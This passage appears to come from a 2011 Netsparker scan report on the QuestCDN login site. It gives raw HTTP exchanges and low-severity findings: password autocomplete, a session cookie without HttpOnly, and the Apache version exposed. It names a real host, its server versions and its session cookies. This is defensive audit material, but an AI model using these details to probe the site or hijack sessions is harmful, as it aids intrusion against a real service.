window.open('/qap/action/showProjPreviewPage?JobPK=1438657&eca=showProjPreviewPage', '', 'height=600,width=700,scrollbars,resizable'); }// --></script></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td width="100%" height="100%" valign="top"> <div class="crumbtrail"><a href="/ipp/projects/prj_browse/ipp_prj_browse_f.html?"><span class="arrow"><--</span>Return to last page</a></div> <form name="userdata" Action="/qap/action/ippLogin" Method="POST"> <input type="hidden" name="root_page" value="true"> <input type="hidden" name="provider" value="453856"> <input type="hidden" name="jobCategoryNo" value="1048445"> <input type="hidden" name="jobNo" value="1438657"> <input type="hidden" name="loginPagePath" value="projects/prj_browse/ipp_prj_browse_f.html"> <input type="hidden" name="loginPageParams" value=""> <h3>Login</h3> <p>Please use your QuestCDN.com Username & Password to log in:</p> <table width="300"> <tr> <td width="150">username:</td> <td width="150"><input type="text" name="username" size="24"></td> </tr> <tr> <td width="150">password:</td> <td width="150"><input type="password" name="password" size="24"></td> </tr> <tr> <td> </td> <td><input type="submit" value="Login"</input></td> </tr> <tr> <td width="115"></td> <td width="185"><a href="/qap/forgotPassword.html">Forgot Password?</a></td> </tr> </table><!-- <p>Not already a member of QuestCDN.com - click <a href="https://secure.questcdn.com/questcdn/subscribe/sub_form.html?root_page=true member_no="<?s:subscriberPK?>" jobCategoryNo="<?p:jobCategoryNo?>" jobNo="<?p:jobNo?>" provider="<?p:provider?>" ">JOIN</a> for your Free membership</p>--><!-- <p>Not already a member of QuestCDN.com - click <a href="https://qap.questcdn.com/qap/subscribe/sub_form.html?root_page=true download_type=plan jobCategoryNo=<?p:jobCategoryNo?> jobNo=<?p:jobNo?> member_no=<?s:subscriberPK?> provider=<?p:provider?>"<font color=red size=3 >JOIN</font></a> for your Free membership</p>--> <p>Not already a member of QuestCDN.com - click <a href="https://qap.questcdn.com/qap/subscribe/sub_form.html?root_page=true&download_type=plan&member_no=&jobCategoryNo=1048445&jobNo=1438657&provider=453856"><font color=red size=3 >JOIN</font></a> for your Free membership</p </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:01:24 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:24 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 3637
Content-Type: text/html;charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Topeka - Projects</title><script type="text/javascript"><!-- function doDownload() { doLogin(); } function doLogin() { document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&member_no=&provider=453856&jobNo=1438657&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); } function doPlanHolders() { //window.open('/qap/projects/prj_add_mod/prj_plan_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/planholder/planholder_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=1100,scrollbars,resizable'); } function confirmPlanDl() { document.location ='/qap/projects/prj_browse/prj_b_dlconf.html?member_no=&job_no=1438657&download_type=plan', '', 'height=300,width=500,scrollbars,resizable'; } function ShowProjectPreview(action) { window.open('/qap/action/showProjPreviewPage?JobPK=1438657&eca=showProjPreviewPage', '', 'height=600,width=700,scrollbars,resizable'); }// --></script></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td width="100%" height="100%" valign="top"> <div class="crumbtrail"><a href="/ipp/projects/prj_browse/ipp_prj_browse_f.html?"><span class="arrow"><--</span>Return to last page</a></div> <form name="userdata" Action="/qap/action/ippLogin" Method="POST"> <input type="hidden" name="root_page" value="true"> <input type="hidden" name="provider" value="453856"> <input type="hidden" name="jobCategoryNo" value="1048445"> <input type="hidden" name="jobNo" value="1438657"> <input type="hidden" name="loginPagePath" value="projects/prj_browse/ipp_prj_browse_f.html"> <input type="hidden" name="loginPageParams" value=""> <h3>Login</h3> <p>Please use your QuestCDN.com Username & Password to log in:</p> <table width="300"> <tr> <td width="150">username:</td> <td width="150"><input type="text" name="username" size="24"></td> </tr> <tr> <td width="150">password:</td> <td width="150"><input type="password" name="password" size="24"></td> </tr> <tr> <td> </td> <td><input type="submit" value="Login"</input></td> </tr> <tr> <td width="115"></td> <td width="185"><a href="/qap/forgotPassword.html">Forgot Password?</a></td> </tr> </table><!-- <p>Not already a member of QuestCDN.com - click <a href="https://secure.questcdn.com/questcdn/subscribe/sub_form.html?root_page=true member_no="<?s:subscriberPK?>" jobCategoryNo="<?p:jobCategoryNo?>" jobNo="<?p:jobNo?>" provider="<?p:provider?>" ">JOIN</a> for your Free membership</p>--><!-- <p>Not already a member of QuestCDN.com - click <a href="https://qap.questcdn.com/qap/subscribe/sub_form.html?root_page=true download_type=plan jobCategoryNo=<?p:jobCategoryNo?> jobNo=<?p:jobNo?> member_no=<?s:subscriberPK?> provider=<?p:provider?>"<font color=red size=3 >JOIN</font></a> for your Free membership</p>--> <p>Not already a member of QuestCDN.com - click <a href="https://qap.questcdn.com/qap/subscribe/sub_form.html?root_page=true&download_type=plan&member_no=&jobCategoryNo=1048445&jobNo=1438657&provider=453856"><font color=red size=3 >JOIN</font></a> for your Free membership</p </td></tr></table></body></html>
|
- /qap/projects/prj_browse/ipp_addenda_login.html
/qap/projects/prj_browse/ipp_addenda_login.html |
Request
GET /qap/projects/prj_browse/ipp_addenda_login.html?jobCategoryNo=1048445&calling_function=%3Fcalling_function&provider=453856&jobNo=1438657 HTTP/1.1
Referer: http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:01:25 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:25 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 3291
Content-Type: text/html;charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Topeka - Projects</title><script type="text/javascript"><!-- function doDownload() { doLogin(); } function doLogin() { document.location = '/qap/projects/prj_browse/ipp_addenda_login.html?jobCategoryNo=1048445&provider=453856&jobNo=1438657&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); } function doPlanHolders() { //window.open('/qap/projects/prj_add_mod/prj_plan_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/planholder/planholder_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=1100,scrollbars,resizable'); } function confirmPlanDl() { document.location = '/qap/projects/prj_browse/prj_addenda_list.html?jobNo=1438657', '', 'height=650,width=650,scrollbars,resizable'; } function ShowProjectPreview(action) { window.open('/qap/action/showProjPreviewPage?JobPK=1438657&eca=showProjPreviewPage', '', 'height=600,width=700,scrollbars,resizable'); }// --></script></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td width="100%" height="100%" valign="top"> <form name="userdata" Action="/qap/action/ippAddendaLogin" Method="POST"> <input type="hidden" name="root_page" value="true"> <input type="hidden" name="provider" value="453856"> <input type="hidden" name="jobCategoryNo" value="1048445"> <input type="hidden" name="jobNo" value="1438657"> <input type="hidden" name="loginPagePath" value="index.html"> <input type="hidden" name="loginPageParams" value=""> <h3>Login</h3> <p>Please use your QuestCDN.com Username & Password to log in:</p> <table width="300"> <tr> <td width="150">username:</td> <td width="150"><input type="text" name="username" size="24"></td> </tr> <tr> <td width="150">password:</td> <td width="150"><input type="password" name="password" size="24"></td> </tr> <tr> <td> </td> <td><input type="submit" value="Login"</input></td> </tr> <tr> <td width="115"></td> <td width="185"><a href="/qap/forgotPassword.html">Forgot Password?</a></td> </tr> </table><!-- <p>Not already a member of QuestCDN.com - click <a href="https://secure.questcdn.com/questcdn/subscribe/sub_form.html?root_page=true jobCategoryNo="<?p:jobCategoryNo?>" jobNo="<?p:jobNo?>" provider="<?p:provider?>" ">JOIN</a> for your Free membership</p>--><!-- <p>Not already a member of QuestCDN.com - click <a href="https://ipp.questcdn/ipp/subscribe/sub_form.html?root_page=true jobCategoryNo=<?p:jobCategoryNo?> jobNo=<?p:jobNo?> provider=<?p:provider?>">JOIN</a> for your Free membership</p>--> <p>Not already a member of QuestCDN.com - click <a href="/qap/subscribe/sub_form.html?jobCategoryNo=1048445&download_type=addenda&root_page=true&provider=453856&jobNo=1438657"><font color=red size=3 >JOIN</font></a> for your Free membership</p> </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:01:25 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:25 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 3291
Content-Type: text/html;charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Topeka - Projects</title><script type="text/javascript"><!-- function doDownload() { doLogin(); } function doLogin() { document.location = '/qap/projects/prj_browse/ipp_addenda_login.html?jobCategoryNo=1048445&provider=453856&jobNo=1438657&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); } function doPlanHolders() { //window.open('/qap/projects/prj_add_mod/prj_plan_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/planholder/planholder_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=1100,scrollbars,resizable'); } function confirmPlanDl() { document.location = '/qap/projects/prj_browse/prj_addenda_list.html?jobNo=1438657', '', 'height=650,width=650,scrollbars,resizable'; } function ShowProjectPreview(action) { window.open('/qap/action/showProjPreviewPage?JobPK=1438657&eca=showProjPreviewPage', '', 'height=600,width=700,scrollbars,resizable'); }// --></script></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td width="100%" height="100%" valign="top"> <form name="userdata" Action="/qap/action/ippAddendaLogin" Method="POST"> <input type="hidden" name="root_page" value="true"> <input type="hidden" name="provider" value="453856"> <input type="hidden" name="jobCategoryNo" value="1048445"> <input type="hidden" name="jobNo" value="1438657"> <input type="hidden" name="loginPagePath" value="index.html"> <input type="hidden" name="loginPageParams" value=""> <h3>Login</h3> <p>Please use your QuestCDN.com Username & Password to log in:</p> <table width="300"> <tr> <td width="150">username:</td> <td width="150"><input type="text" name="username" size="24"></td> </tr> <tr> <td width="150">password:</td> <td width="150"><input type="password" name="password" size="24"></td> </tr> <tr> <td> </td> <td><input type="submit" value="Login"</input></td> </tr> <tr> <td width="115"></td> <td width="185"><a href="/qap/forgotPassword.html">Forgot Password?</a></td> </tr> </table><!-- <p>Not already a member of QuestCDN.com - click <a href="https://secure.questcdn.com/questcdn/subscribe/sub_form.html?root_page=true jobCategoryNo="<?p:jobCategoryNo?>" jobNo="<?p:jobNo?>" provider="<?p:provider?>" ">JOIN</a> for your Free membership</p>--><!-- <p>Not already a member of QuestCDN.com - click <a href="https://ipp.questcdn/ipp/subscribe/sub_form.html?root_page=true jobCategoryNo=<?p:jobCategoryNo?> jobNo=<?p:jobNo?> provider=<?p:provider?>">JOIN</a> for your Free membership</p>--> <p>Not already a member of QuestCDN.com - click <a href="/qap/subscribe/sub_form.html?jobCategoryNo=1048445&download_type=addenda&root_page=true&provider=453856&jobNo=1438657"><font color=red size=3 >JOIN</font></a> for your Free membership</p> </td></tr></table></body></html>
Auto Complete Enabled
Auto Complete Enabled
1
TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".
Impact
Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.Remedy
Add the attribute
autocomplete="off" to the form tag or to individual "input" fields.Actions to Take
- See the remedy for the solution.
- Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
- Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.
Required Skills for Successful Exploitation
Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.
External References
|
- /qap/
/qap/ CONFIRMED |
Identified Field Name
password
Request
GET /qap/ HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:01:22 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/2363182003619323783; Expires=Thu, 03-Mar-2011 20:01:22 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 3464
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>QUESTCDN: Providers List</title> <script type="text/javascript" language="javascript"> function tzTest() { return; var rightNow = new Date(); var jan1 = new Date(rightNow.getFullYear(), 0, 1, 0, 0, 0, 0); var temp = jan1.toUTCString(); var jan2 = new Date(temp.substring(0, temp.lastIndexOf(" ")-1)); var std_time_offset = (jan1 - jan2) / (1000 * 60 * 60); var june1 = new Date(rightNow.getFullYear(), 6, 1, 0, 0, 0, 0); temp = june1.toUTCString(); var june2 = new Date(temp.substring(0, temp.lastIndexOf(" ")-1)); var daylight_time_offset = (june1 - june2) / (1000 * 60 * 60); var dst; if (std_time_offset == daylight_time_offset) dst = "0"; // daylight savings time is NOT observed else dst = "1"; // daylight savings time is observed var msg = ""; msg += "rightNow: " + rightNow + "\r\n"; msg += "std_time_offset: " + std_time_offset + "\r\n"; msg += "jan1: " + jan1 + "\r\n"; msg += "jan2: " + jan2 + "\r\n"; msg += "jan GMT: " + jan1.toGMTString() + "\r\n"; msg += "jan UTC: " + jan1.toUTCString() + "\r\n"; msg += "\r\n"; msg += "daylight_time_offset: " + daylight_time_offset + "\r\n"; msg += "jun1: " + june1 + "\r\n"; msg += "jun2: " + june2 + "\r\n"; msg += "jun GMT: " + june1.toGMTString() + "\r\n"; msg += "jun UTC: " + june1.toUTCString() + "\r\n"; msg += "dst: " + dst + "\r\n"; msg += "jan tzOffset: " + jan1.getTimezoneOffset() + "\r\n"; msg += "jun tzOffset: " + june1.getTimezoneOffset() + "\r\n"; msg += "Now tzOffset: " + rightNow.getTimezoneOffset() + "\r\n"; alert(msg); } </script> </head> <body> <form name="userdata" action="/qap/action/l2Login" method="POST"> <input type="hidden" name="loginPagePath" value="index.html"/> <table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"> <tr> <td style="width:100%;height:100%" valign="top"> <h3>Login</h3> <p>Please use your QuestCDN.com Username & Password to log in:</p> <table> <tr> <td style="width:100">username:</td> <td><input type="text" name="username" size="24"/></td> </tr> <tr> <td>password:</td> <td><input type="password" name="password" size="24"/></td> </tr> <tr> <td> </td> <td><input type="submit" value="Login"/></td> </tr> </table> </td> </tr> </table> </form> <script type="text/javascript"> tzTest(); </script> </body></html>
Date: Tue, 01 Mar 2011 20:01:22 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/2363182003619323783; Expires=Thu, 03-Mar-2011 20:01:22 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 3464
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>QUESTCDN: Providers List</title> <script type="text/javascript" language="javascript"> function tzTest() { return; var rightNow = new Date(); var jan1 = new Date(rightNow.getFullYear(), 0, 1, 0, 0, 0, 0); var temp = jan1.toUTCString(); var jan2 = new Date(temp.substring(0, temp.lastIndexOf(" ")-1)); var std_time_offset = (jan1 - jan2) / (1000 * 60 * 60); var june1 = new Date(rightNow.getFullYear(), 6, 1, 0, 0, 0, 0); temp = june1.toUTCString(); var june2 = new Date(temp.substring(0, temp.lastIndexOf(" ")-1)); var daylight_time_offset = (june1 - june2) / (1000 * 60 * 60); var dst; if (std_time_offset == daylight_time_offset) dst = "0"; // daylight savings time is NOT observed else dst = "1"; // daylight savings time is observed var msg = ""; msg += "rightNow: " + rightNow + "\r\n"; msg += "std_time_offset: " + std_time_offset + "\r\n"; msg += "jan1: " + jan1 + "\r\n"; msg += "jan2: " + jan2 + "\r\n"; msg += "jan GMT: " + jan1.toGMTString() + "\r\n"; msg += "jan UTC: " + jan1.toUTCString() + "\r\n"; msg += "\r\n"; msg += "daylight_time_offset: " + daylight_time_offset + "\r\n"; msg += "jun1: " + june1 + "\r\n"; msg += "jun2: " + june2 + "\r\n"; msg += "jun GMT: " + june1.toGMTString() + "\r\n"; msg += "jun UTC: " + june1.toUTCString() + "\r\n"; msg += "dst: " + dst + "\r\n"; msg += "jan tzOffset: " + jan1.getTimezoneOffset() + "\r\n"; msg += "jun tzOffset: " + june1.getTimezoneOffset() + "\r\n"; msg += "Now tzOffset: " + rightNow.getTimezoneOffset() + "\r\n"; alert(msg); } </script> </head> <body> <form name="userdata" action="/qap/action/l2Login" method="POST"> <input type="hidden" name="loginPagePath" value="index.html"/> <table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"> <tr> <td style="width:100%;height:100%" valign="top"> <h3>Login</h3> <p>Please use your QuestCDN.com Username & Password to log in:</p> <table> <tr> <td style="width:100">username:</td> <td><input type="text" name="username" size="24"/></td> </tr> <tr> <td>password:</td> <td><input type="password" name="password" size="24"/></td> </tr> <tr> <td> </td> <td><input type="submit" value="Login"/></td> </tr> </table> </td> </tr> </table> </form> <script type="text/javascript"> tzTest(); </script> </body></html>
Cookie Not Marked As HttpOnly
Cookie Not Marked As HttpOnly
1
TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..
Impact
During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.Actions to Take
- See the remedy for solution
- Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.
Remedy
Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.
External References
|
- /qap/
/qap/ CONFIRMED |
Identified Cookie
sessionIdentifier
Request
GET /qap/ HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:01:22 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/2363182003619323783; Expires=Thu, 03-Mar-2011 20:01:22 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 3464
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>QUESTCDN: Providers List</title> <script type="text/javascript" language="javascript"> function tzTest() { return; var rightNow = new Date(); var jan1 = new Date(rightNow.getFullYear(), 0, 1, 0, 0, 0, 0); var temp = jan1.toUTCString(); var jan2 = new Date(temp.substring(0, temp.lastIndexOf(" ")-1)); var std_time_offset = (jan1 - jan2) / (1000 * 60 * 60); var june1 = new Date(rightNow.getFullYear(), 6, 1, 0, 0, 0, 0); temp = june1.toUTCString(); var june2 = new Date(temp.substring(0, temp.lastIndexOf(" ")-1)); var daylight_time_offset = (june1 - june2) / (1000 * 60 * 60); var dst; if (std_time_offset == daylight_time_offset) dst = "0"; // daylight savings time is NOT observed else dst = "1"; // daylight savings time is observed var msg = ""; msg += "rightNow: " + rightNow + "\r\n"; msg += "std_time_offset: " + std_time_offset + "\r\n"; msg += "jan1: " + jan1 + "\r\n"; msg += "jan2: " + jan2 + "\r\n"; msg += "jan GMT: " + jan1.toGMTString() + "\r\n"; msg += "jan UTC: " + jan1.toUTCString() + "\r\n"; msg += "\r\n"; msg += "daylight_time_offset: " + daylight_time_offset + "\r\n"; msg += "jun1: " + june1 + "\r\n"; msg += "jun2: " + june2 + "\r\n"; msg += "jun GMT: " + june1.toGMTString() + "\r\n"; msg += "jun UTC: " + june1.toUTCString() + "\r\n"; msg += "dst: " + dst + "\r\n"; msg += "jan tzOffset: " + jan1.getTimezoneOffset() + "\r\n"; msg += "jun tzOffset: " + june1.getTimezoneOffset() + "\r\n"; msg += "Now tzOffset: " + rightNow.getTimezoneOffset() + "\r\n"; alert(msg); } </script> </head> <body> <form name="userdata" action="/qap/action/l2Login" method="POST"> <input type="hidden" name="loginPagePath" value="index.html"/> <table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"> <tr> <td style="width:100%;height:100%" valign="top"> <h3>Login</h3> <p>Please use your QuestCDN.com Username & Password to log in:</p> <table> <tr> <td style="width:100">username:</td> <td><input type="text" name="username" size="24"/></td> </tr> <tr> <td>password:</td> <td><input type="password" name="password" size="24"/></td> </tr> <tr> <td> </td> <td><input type="submit" value="Login"/></td> </tr> </table> </td> </tr> </table> </form> <script type="text/javascript"> tzTest(); </script> </body></html>
Date: Tue, 01 Mar 2011 20:01:22 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/2363182003619323783; Expires=Thu, 03-Mar-2011 20:01:22 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 3464
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>QUESTCDN: Providers List</title> <script type="text/javascript" language="javascript"> function tzTest() { return; var rightNow = new Date(); var jan1 = new Date(rightNow.getFullYear(), 0, 1, 0, 0, 0, 0); var temp = jan1.toUTCString(); var jan2 = new Date(temp.substring(0, temp.lastIndexOf(" ")-1)); var std_time_offset = (jan1 - jan2) / (1000 * 60 * 60); var june1 = new Date(rightNow.getFullYear(), 6, 1, 0, 0, 0, 0); temp = june1.toUTCString(); var june2 = new Date(temp.substring(0, temp.lastIndexOf(" ")-1)); var daylight_time_offset = (june1 - june2) / (1000 * 60 * 60); var dst; if (std_time_offset == daylight_time_offset) dst = "0"; // daylight savings time is NOT observed else dst = "1"; // daylight savings time is observed var msg = ""; msg += "rightNow: " + rightNow + "\r\n"; msg += "std_time_offset: " + std_time_offset + "\r\n"; msg += "jan1: " + jan1 + "\r\n"; msg += "jan2: " + jan2 + "\r\n"; msg += "jan GMT: " + jan1.toGMTString() + "\r\n"; msg += "jan UTC: " + jan1.toUTCString() + "\r\n"; msg += "\r\n"; msg += "daylight_time_offset: " + daylight_time_offset + "\r\n"; msg += "jun1: " + june1 + "\r\n"; msg += "jun2: " + june2 + "\r\n"; msg += "jun GMT: " + june1.toGMTString() + "\r\n"; msg += "jun UTC: " + june1.toUTCString() + "\r\n"; msg += "dst: " + dst + "\r\n"; msg += "jan tzOffset: " + jan1.getTimezoneOffset() + "\r\n"; msg += "jun tzOffset: " + june1.getTimezoneOffset() + "\r\n"; msg += "Now tzOffset: " + rightNow.getTimezoneOffset() + "\r\n"; alert(msg); } </script> </head> <body> <form name="userdata" action="/qap/action/l2Login" method="POST"> <input type="hidden" name="loginPagePath" value="index.html"/> <table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"> <tr> <td style="width:100%;height:100%" valign="top"> <h3>Login</h3> <p>Please use your QuestCDN.com Username & Password to log in:</p> <table> <tr> <td style="width:100">username:</td> <td><input type="text" name="username" size="24"/></td> </tr> <tr> <td>password:</td> <td><input type="password" name="password" size="24"/></td> </tr> <tr> <td> </td> <td><input type="submit" value="Login"/></td> </tr> </table> </td> </tr> </table> </form> <script type="text/javascript"> tzTest(); </script> </body></html>
Apache Version Disclosure
Apache Version Disclosure
1
TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.
Impact
An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.
Remedy
Configure your web server to prevent information leakage from the
SERVER header of its HTTP response.
|
- /
/ |
Extracted Version
Apache/2.2.4 (Ubuntu)
Request
GET / HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 302 Found
Date: Tue, 01 Mar 2011 20:01:22 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Location: http://qap.questcdn.com/qap/
Content-Length: 355
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://qap.questcdn.com/qap/">here</a>.</p><hr><address>Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6 Server at qap.questcdn.com Port 80</address></body></html>
Date: Tue, 01 Mar 2011 20:01:22 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Location: http://qap.questcdn.com/qap/
Content-Length: 355
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
